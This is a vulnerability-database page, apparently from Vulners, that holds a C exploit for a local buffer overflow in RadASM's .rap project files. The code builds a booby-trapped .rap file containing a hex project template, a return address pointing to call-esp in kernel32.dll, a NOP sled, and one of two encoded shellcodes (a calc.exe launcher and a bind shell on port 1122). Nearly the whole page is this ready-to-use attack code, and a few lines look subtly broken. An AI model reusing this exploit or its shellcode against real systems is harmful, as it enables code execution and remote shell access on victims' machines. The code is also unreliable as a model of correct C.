Vulners
Lucene search
Radasm .rap file local buffer overflow vulnerability
#include<stdio.h>
#include<windows.h>
#include<getopt.h>
void gen_random(char*,const int);
void print(char*);
unsigned int getFsize(FILE*,char*);
void buildfile(char*);
int make_bindshell(unsigned short);
void help();
void printshell();
DWORD SearchStream(const char *,size_t,const char *,size_t);
DWORD GetNtosDelta (VOID);
DWORD GetOSVersion (VOID);
DWORD FindRetToEspAddress(VOID);
#define VULNF "ufwew.rap"
#define VER "2.2.1.6"
#define POCNAME "Radasm .rap file local buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define EIPOFFSET 0xDD
#define NOP "\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90"
#define NUL '\0'
#define CLEAR(x) free(x)
#define WXP_DELTA 0xA67FF;
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;
char file[]={ //1534 bytes
0x5B, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x5D, 0x0D, 0x0D, 0x0A, 0x41, 0x73, 0x73, 0x65,
0x6D, 0x62, 0x6C, 0x65, 0x72, 0x3D, 0x6D, 0x61, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x45, 0x78, 0x70, 0x61,
0x6E, 0x64, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x5B, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D,
0x0A, 0x31, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x72, 0x41, 0x51, 0x42,
0x63, 0x38, 0x57, 0x73, 0x61, 0x31, 0x78, 0x56, 0x50, 0x66, 0x76, 0x4A, 0x63, 0x72, 0x67, 0x52,
0x59, 0x77, 0x54, 0x69, 0x69, 0x7A, 0x73, 0x32, 0x74, 0x72, 0x51, 0x46, 0x36, 0x39, 0x41, 0x7A,
0x42, 0x6C, 0x61, 0x78, 0x33, 0x43, 0x46, 0x33, 0x45, 0x44, 0x4E, 0x68, 0x6D, 0x33, 0x73, 0x6F,
0x4C, 0x42, 0x50, 0x68, 0x37, 0x31, 0x59, 0x65, 0x78, 0x75, 0x69, 0x65, 0x61, 0x6F, 0x45, 0x69,
0x49, 0x67, 0x78, 0x49, 0x58, 0x34, 0x61, 0x32, 0x64, 0x52, 0x45, 0x62, 0x62, 0x53, 0x71, 0x57,
0x79, 0x36, 0x79, 0x68, 0x4B, 0x49, 0x44, 0x43, 0x64, 0x4A, 0x4F, 0x79, 0x61, 0x70, 0x6E, 0x78,
0x72, 0x70, 0x4D, 0x43, 0x41, 0x52, 0x43, 0x72, 0x34, 0x7A, 0x64, 0x47, 0x63, 0x38, 0x31, 0x74,
0x42, 0x44, 0x4B, 0x73, 0x4D, 0x6C, 0x61, 0x5A, 0x54, 0x58, 0x43, 0x31, 0x4F, 0x38, 0x59, 0x46,
0x4F, 0x47, 0x4B, 0x6A, 0x78, 0x52, 0x72, 0x4A, 0x42, 0x64, 0x54, 0x33, 0x68, 0x56, 0x4F, 0x66,
0x6F, 0x61, 0x4D, 0x65, 0x41, 0x6A, 0x53, 0x57, 0x66, 0x63, 0x68, 0x6F, 0x5A, 0x59, 0x46, 0x59,
0x5A, 0x35, 0x42, 0x36, 0x6B, 0x7A, 0x4D, 0x43, 0x6B, 0x38, 0x52, 0x36, 0x42, 0x45, 0x75, 0x5A,
0x4D, 0x72, 0x46, 0x36, 0x63, 0x49, 0x36, 0x4E, 0x58, 0x38, 0x44, 0x59, 0x64, 0x44, 0x33, 0x6F,
0x6A, 0x78, 0x53, 0x6E, 0x71, 0x50, 0x54, 0x47, 0x66, 0x52, 0x79, 0x69, 0x6C, 0x4F, 0x59, 0x47,
0x78, 0x6C, 0x53, 0x58, 0x50, 0x74, 0x4C, 0x4A, 0x62, 0x6F, 0x48, 0x38, 0x53, 0x34, 0x6B, 0x77,
0x49, 0x67, 0x54, 0x78, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41, 0x41, 0x41, 0x7A, 0x4F, 0x4C, 0x4D,
0x72, 0x62, 0x41, 0x79, 0x66, 0x4B, 0x55, 0x55, 0x54, 0x73, 0x47, 0x43, 0x6F, 0x52, 0x62, 0x6C,
0x73, 0x61, 0x71, 0x76, 0x36, 0x55, 0x70, 0x64, 0x76, 0x4E, 0x49, 0x73, 0x4E, 0x72, 0x6D, 0x77,
0x55, 0x6C, 0x4E, 0x35, 0x75, 0x39, 0x74, 0x33, 0x74, 0x67, 0x6A, 0x32, 0x74, 0x75, 0x73, 0x5A,
0x42, 0x61, 0x75, 0x46, 0x6B, 0x72, 0x46, 0x43, 0x4A, 0x43, 0x6D, 0x5A, 0x46, 0x4F, 0x76, 0x31,
0x51, 0x44, 0x49, 0x49, 0x58, 0x4A, 0x4E, 0x5A, 0x49, 0x39, 0x35, 0x68, 0x46, 0x51, 0x72, 0x37,
0x37, 0x42, 0x49, 0x45, 0x6C, 0x79, 0x63, 0x74, 0x34, 0x41, 0x6A, 0x36, 0x50, 0x4B, 0x6E, 0x5A,
0x70, 0x7A, 0x52, 0x69, 0x4B, 0x59, 0x70, 0x5A, 0x67, 0x6E, 0x53, 0x4F, 0x4B, 0x6C, 0x71, 0x38,
0x41, 0x7A, 0x72, 0x48, 0x71, 0x44, 0x6F, 0x47, 0x4C, 0x34, 0x52, 0x48, 0x79, 0x71, 0x79, 0x58,
0x33, 0x67, 0x35, 0x41, 0x79, 0x79, 0x36, 0x31, 0x6C, 0x65, 0x44, 0x59, 0x54, 0x33, 0x43, 0x45,
0x57, 0x38, 0x4B, 0x36, 0x39, 0x72, 0x6B, 0x6C, 0x50, 0x47, 0x74, 0x66, 0x55, 0x52, 0x32, 0x49,
0x5A, 0x32, 0x6D, 0x42, 0x31, 0x53, 0x37, 0x4E, 0x4C, 0x74, 0x32, 0x6E, 0x51, 0x66, 0x6A, 0x33,
0x53, 0x4C, 0x33, 0x58, 0x42, 0x79, 0x49, 0x6D, 0x63, 0x69, 0x51, 0x54, 0x71, 0x56, 0x61, 0x41,
0x55, 0x6E, 0x4A, 0x76, 0x55, 0x6D, 0x48, 0x56, 0x51, 0x47, 0x73, 0x54, 0x6D, 0x76, 0x48, 0x65,
0x75, 0x53, 0x45, 0x42, 0x4D, 0x53, 0x50, 0x68, 0x32, 0x51, 0x36, 0x64, 0x51, 0x41, 0x6A, 0x79,
0x34, 0x4B, 0x6A, 0x73, 0x66, 0x53, 0x58, 0x46, 0x34, 0x59, 0x50, 0x38, 0x61, 0x72, 0x46, 0x33,
0x53, 0x4C, 0x4C, 0x6E, 0x79, 0x33, 0x30, 0x4B, 0x4B, 0x7A, 0x69, 0x48, 0x74, 0x52, 0x62, 0x4F,
0x45, 0x32, 0x75, 0x38, 0x71, 0x76, 0x4A, 0x50, 0x33, 0x42, 0x36, 0x55, 0x69, 0x75, 0x31, 0x67,
0x4A, 0x30, 0x33, 0x4F, 0x68, 0x6D, 0x57, 0x76, 0x6E, 0x37, 0x4D, 0x49, 0x72, 0x39, 0x6F, 0x44,
0x55, 0x54, 0x4F, 0x58, 0x37, 0x4E, 0x59, 0x45, 0x6B, 0x5A, 0x67, 0x7A, 0x55, 0x6E, 0x79, 0x31,
0x73, 0x77, 0x4F, 0x62, 0x64, 0x59, 0x53, 0x45, 0x76, 0x57, 0x52, 0x42, 0x4C, 0x7A, 0x5A, 0x30,
0x32, 0x68, 0x36, 0x37, 0x59, 0x72, 0x6C, 0x76, 0x42, 0x6E, 0x64, 0x6E, 0x34, 0x63, 0x58, 0x50,
0x61, 0x6F, 0x61, 0x4B, 0x6B, 0x35, 0x6C, 0x51, 0x6E, 0x33, 0x33, 0x68, 0x66, 0x4E, 0x57, 0x50,
0x67, 0x72, 0x38, 0x38, 0x31, 0x6E, 0x50, 0x37, 0x56, 0x78, 0x45, 0x45, 0x34, 0x46, 0x64, 0x67,
0x63, 0x4C, 0x39, 0x66, 0x4F, 0x50, 0x79, 0x63, 0x39, 0x38, 0x62, 0x49, 0x38, 0x39, 0x71, 0x54,
0x50, 0x46, 0x74, 0x79, 0x73, 0x4C, 0x31, 0x51, 0x34, 0x47, 0x54, 0x4F, 0x50, 0x77, 0x44, 0x37,
0x6B, 0x6B, 0x71, 0x50, 0x71, 0x51, 0x35, 0x50, 0x4E, 0x45, 0x45, 0x66, 0x75, 0x54, 0x6C, 0x43,
0x48, 0x39, 0x57, 0x70, 0x49, 0x59, 0x61, 0x50, 0x48, 0x57, 0x66, 0x55, 0x54, 0x6A, 0x6C, 0x54,
0x4F, 0x53, 0x6A, 0x33, 0x69, 0x48, 0x37, 0x4A, 0x54, 0x52, 0x73, 0x62, 0x59, 0x48, 0x31, 0x33,
0x33, 0x54, 0x79, 0x57, 0x4C, 0x49, 0x42, 0x34, 0x47, 0x33, 0x73, 0x56, 0x30, 0x79, 0x6B, 0x50,
0x64, 0x73, 0x37, 0x48, 0x58, 0x32, 0x37, 0x4B, 0x62, 0x4E, 0x43, 0x43, 0x79, 0x74, 0x4A, 0x52,
0x38, 0x43, 0x75, 0x36, 0x58, 0x46, 0x70, 0x74, 0x45, 0x49, 0x50, 0x36, 0x38, 0x76, 0x38, 0x5A,
0x64, 0x56, 0x36, 0x30, 0x47, 0x58, 0x41, 0x50, 0x5A, 0x48, 0x41, 0x44, 0x32, 0x76, 0x51, 0x6B,
0x57, 0x72, 0x70, 0x71, 0x69, 0x77, 0x64, 0x6F, 0x33, 0x48, 0x72, 0x64, 0x74, 0x36, 0x7A, 0x33,
0x6C, 0x53, 0x54, 0x70, 0x67, 0x54, 0x70, 0x52, 0x70, 0x52, 0x56, 0x63, 0x77, 0x6F, 0x36, 0x48,
0x4D, 0x38, 0x75, 0x41, 0x38, 0x44, 0x39, 0x65, 0x45, 0x34, 0x5A, 0x41, 0x44, 0x74, 0x6D, 0x76,
0x57, 0x76, 0x4E, 0x32, 0x30, 0x4C, 0x42, 0x48, 0x53, 0x6B, 0x44, 0x36, 0x71, 0x72, 0x37, 0x4A,
0x31, 0x68, 0x41, 0x6B, 0x54, 0x6B, 0x55, 0x46, 0x76, 0x4D, 0x41, 0x30, 0x4F, 0x53, 0x61, 0x39,
0x31, 0x65, 0x39, 0x67, 0x71, 0x56, 0x4E, 0x42, 0x65, 0x67, 0x31, 0x30, 0x67, 0x41, 0x49, 0x34,
0x4F, 0x4D, 0x72, 0x78, 0x46, 0x32, 0x6C, 0x74, 0x52, 0x50, 0x57, 0x61, 0x63, 0x4B, 0x77, 0x68,
0x7A, 0x51, 0x79, 0x77, 0x38, 0x62, 0x79, 0x78, 0x49, 0x46, 0x77, 0x4F, 0x51, 0x66, 0x78, 0x46,
0x59, 0x79, 0x30, 0x71, 0x75, 0x75, 0x62, 0x70, 0x43, 0x7A, 0x49, 0x37, 0x31, 0x4D, 0x52, 0x56,
0x4F, 0x67, 0x44, 0x6B, 0x6F, 0x38, 0x66, 0x6E, 0x50, 0x59, 0x6C, 0x61, 0x70, 0x64, 0x76, 0x78,
0x6C, 0x55, 0x73, 0x42, 0x48, 0x32, 0x39, 0x43, 0x6D, 0x33, 0x4F, 0x52, 0x59, 0x6B, 0x66, 0x72,
0x6A, 0x52, 0x5A, 0x44, 0x64, 0x77, 0x36, 0x4C, 0x63, 0x70, 0x58, 0x33, 0x33, 0x65, 0x31, 0x49,
0x4F, 0x77, 0x57, 0x52, 0x32, 0x75, 0x61, 0x41, 0x74, 0x5A, 0x56, 0x42, 0x35, 0x79, 0x69, 0x39,
0x69, 0x6A, 0x53, 0x41, 0x6A, 0x42, 0x51, 0x6A, 0x67, 0x6E, 0x5A, 0x53, 0x43, 0x65, 0x38, 0x6E,
0x50, 0x51, 0x48, 0x6E, 0x70, 0x70, 0x5A, 0x71, 0x74, 0x34, 0x35, 0x36, 0x75, 0x4E, 0x68, 0x61,
0x41, 0x41, 0x5A, 0x2E, 0x41, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x41, 0x56, 0x50, 0x20,
0x4F, 0x76, 0x65, 0x72, 0x2E, 0x49, 0x6E, 0x63, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65,
0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D, 0x0A, 0x30, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F,
0x76, 0x65, 0x72, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65, 0x44,
0x65, 0x66, 0x5D, 0x0D, 0x0D, 0x0A, 0x4D, 0x65, 0x6E, 0x75, 0x3D, 0x30, 0x2C, 0x31, 0x2C, 0x31,
0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30,
0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x0D, 0x0D, 0x0A, 0x31, 0x3D, 0x34,
0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x52, 0x43, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x76, 0x2C,
0x31, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x33, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E,
0x45, 0x58, 0x45, 0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70,
0x20, 0x2F, 0x6E, 0x6F, 0x36, 0x43, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22,
0x2C, 0x32, 0x0D, 0x0D, 0x0A, 0x33, 0x3D, 0x35, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4C, 0x49,
0x4E, 0x4B, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x53, 0x55, 0x42, 0x53, 0x59, 0x53, 0x54, 0x45,
0x4D, 0x3A, 0x57, 0x49, 0x4E, 0x44, 0x4F, 0x57, 0x53, 0x20, 0x2F, 0x52, 0x45, 0x4C, 0x45, 0x41,
0x53, 0x45, 0x20, 0x2F, 0x56, 0x45, 0x52, 0x53, 0x49, 0x4F, 0x4E, 0x3A, 0x34, 0x2E, 0x30, 0x20,
0x2F, 0x4C, 0x49, 0x42, 0x50, 0x41, 0x54, 0x48, 0x3A, 0x22, 0x24, 0x4C, 0x22, 0x20, 0x2F, 0x4F,
0x55, 0x54, 0x3A, 0x22, 0x24, 0x35, 0x22, 0x2C, 0x33, 0x0D, 0x0D, 0x0A, 0x34, 0x3D, 0x30, 0x2C,
0x30, 0x2C, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x35, 0x3D, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x6F, 0x62,
0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x43, 0x56, 0x54, 0x52, 0x45, 0x53, 0x2E, 0x45, 0x58,
0x45, 0x2C, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x36, 0x3D, 0x2A,
0x2E, 0x6F, 0x62, 0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E, 0x45, 0x58, 0x45,
0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70, 0x20, 0x2F, 0x6E,
0x6F, 0x6C, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22, 0x2C, 0x2A, 0x2E, 0x61,
0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x37, 0x3D, 0x30, 0x2C, 0x30, 0x2C, 0x22, 0x24, 0x45, 0x5C, 0x4F,
0x6C, 0x6C, 0x79, 0x44, 0x62, 0x67, 0x22, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x5B, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x5D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x3D, 0x41, 0x64, 0x64, 0x65,
0x64, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x73, 0x2C, 0x41, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79,
0x2C, 0x52, 0x65, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x73, 0x2C, 0x4D, 0x69, 0x73, 0x63, 0x2C,
0x4D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x73, 0x0D, 0x0A, 0x31, 0x3D, 0x31, 0x0D, 0x0A,};
DWORD g_dwOsVersion = 0;
LPVOID g_PatchAddress = NULL;
typedef BOOL(WINAPI *PENUMDEVICES)(LPVOID*,DWORD ,LPDWORD);
typedef DWORD(WINAPI *PGETDEVNAME)(LPVOID ImageBase,char *lpBaseName,DWORD nSize);
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
enum OSes
{
OS_WXP=1,
OS_W2K,
OS_W2K3,
OS_VISTA
};
typedef enum{
True=1,
False=0,
Error=-1
}boolean;
struct{
char* sname;
int sz;
char* shell;
}use[]={
{"calc.exe",338,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63"},
{
"Bind port 1122",709,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
"\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
"\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
"\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
"\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"
},
{NUL,NUL}
};
struct{
unsigned int code;
}usez;
DWORD ret;
int S;
int main(int argc,char* argv[]){
ret=FindRetToEspAddress();//default eip
if(argc<2){
system("cls");
help();
GetNtosDelta();
printshell();
printf("[^]The default retcode is :0x%X",ret);
exit(0);}
printf("[!]%s\n[!]%s\n[!]By %s\n",POCNAME,VER,AUTHOR);
int opt;
while((opt=getopt(argc,argv,"s:t"))!=-1){
switch(opt){
case 's':
S=atoi(optarg);
break;
case 't':
sscanf(argv[4],"%x",&ret);
break;
default:
help();
}}
buildfile(VULNF);
printf("[#]You selected: %s\n",use[S].sname);
print("DONE!");
getchar();
return 0;
}
void buildfile(char* fname){
char buffer[100000];
gen_random(buffer,5000);
memcpy(buffer,file,strlen(file));
memcpy(buffer+292,&ret,4);
memcpy(buffer+312,NOP,10);
memcpy(buffer+322,use[S].shell,strlen(use[S].shell));
printf("[#]Your Retcode is: 0x%X\n",ret);
FILE* f=fopen(fname,"wb");
if(f){
fwrite(buffer,1,1534,f);
fclose(f);
}
else {
print("Error in writing file");
exit(0);
}
free(buffer);
free(file);
int sz=getFsize(f,fname);
printf("[!]File is %d bytes\n",sz);
}
void help()
{ char h[]="************************************************\n"
"*Radasm .rap file local buffer overflow exploit*\n"
"*syntax: [-h<shellcode>] [-t<your target>] *\n"
"* -s shellcode to run 0 or 1 *\n"
"* -t your target *\n"
"* example: radasm.exe -s 0 -t 0xFFFFFFFF *\n"
"* If you want a retcode default from your *\n"
"* memory don't use -t option *\n"
"************************************************\n";
printf("%s",h);}
void printshell()
{ print("We can use:");
int i;
FOR(i,0,2){
printf("[!] %d. %s of size: %d bytes\n",i,use[i].sname,strlen(use[i].shell)); }
}
DWORD GetOSVersion (VOID)
{
OSVERSIONINFOA osvi;
DWORD retval = 0;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
if(GetVersionExA(&osvi))
{ if(osvi.dwMajorVersion==5)
{
switch(osvi.dwMinorVersion)
{
case 0:
retval=OS_W2K;
break;
case 1:
retval=OS_WXP;
break;
case 2:
retval=OS_W2K3;
break;
}
}
else if(osvi.dwMajorVersion==6)
{retval=OS_VISTA;
}
}
g_dwOsVersion=retval;
return retval;
}
DWORD GetNtosDelta (VOID)
{ DWORD retval = 0;
switch(GetOSVersion())
{
case OS_VISTA:
print("System identified as Windows Vista\n");
retval=WVISTA_DELTA;
break;
case OS_W2K:
print("System identified as Windows 2000\n");
retval=W2K_DELTA;
break;
case OS_W2K3:
print("System identified as Windows 2003\n");
retval=W2K3_DELTA;
break;
case OS_WXP:
print("System identified as Windows XP\n");
retval=WXP_DELTA;
break;
default:
print("Unidentified system!\n");
}
return retval;
}
DWORD SearchStream(
const char *pvStream,
size_t uStreamSize,
const char *pvSubStream,
size_t uSubStreamSize)
{unsigned int uCount = 0,i,j;
while( (uStreamSize) > (uCount) ) {
for(i=0;i<=(uSubStreamSize-1);i++) {
if(*pvStream != pvSubStream[i]) {
*pvStream++;
if( i>0 ) {
for(j=0;j<i;j++)
*pvStream--;
}
break;
}
if(i==(uSubStreamSize-1))
return(uCount);
*pvStream++;
}
uCount++;
}
return -1;
}
DWORD FindRetToEspAddress(VOID)
{HMODULE hModule = GetModuleHandle("kernel32.dll");
DWORD dwEspRet;
char* pszCallEsp = "\xFF\xD4";
PIMAGE_DOS_HEADER pimage_dos_header;
PIMAGE_NT_HEADERS pimage_nt_headers;
pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);
dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));
return (dwEspRet += (DWORD)hModule);
}
unsigned int getFsize(FILE* g,char* gname)
{unsigned int s;
g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;}
void print(char* msg)
{
printf("[*]%s\n",msg);
}
void gen_random(char *s, const int len)
{ int i; //helps u find the offsets
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
